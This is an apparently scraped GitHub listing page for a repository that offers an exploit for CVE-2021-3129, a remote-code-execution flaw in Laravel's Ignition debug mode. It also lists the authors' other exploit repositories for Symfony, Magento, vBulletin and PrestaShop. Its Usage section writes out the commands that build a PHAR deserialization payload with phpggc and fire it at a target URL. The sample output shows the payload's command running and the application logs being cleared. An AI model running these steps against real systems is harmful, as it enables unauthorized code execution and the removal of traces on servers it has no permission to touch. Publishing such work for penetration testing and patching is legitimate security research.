ambionics/laravel-exploits ambionics/laravel-exploits

  • Stars
    star
    238
  • Rank 163,906 (Top 4 %)
  • Language
    Python
  • Created over 3 years ago
  • Updated 12 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
ambionics/laravel-exploits
github

ambionics

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Exploit for CVE-2021-3129

laravel-exploits

Exploit for CVE-2021-3129 Details: https://www.ambionics.io/blog/laravel-debug-rce

Usage

$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id 
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared

More Repositories

1

phpggc

PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
PHP
3,040
star
2

symfony-exploits

Exploits targeting Symfony
Python
161
star
3

mt_rand-reverse

Script to recover mt_rand()'s seed with only two outputs and without any bruteforce.
Python
148
star
4

magento-exploits

Exploits for Magento 2.3.0 and lower
Python
144
star
5

vbulletin-exploits

Exploits targeting vBulletin.
Python
66
star
6

prestashop-exploits

Collection of exploits/POC for PrestaShop cookie vulnerabilities (CVE-2018-13784)
Python
48
star
7

wrapwrap

Generates a `php://filter` chain that adds a prefix and a suffix to the contents of a file.
Python
3
star
8

sqreen-exploit

Sqreen microagent RCE
JavaScript
2
star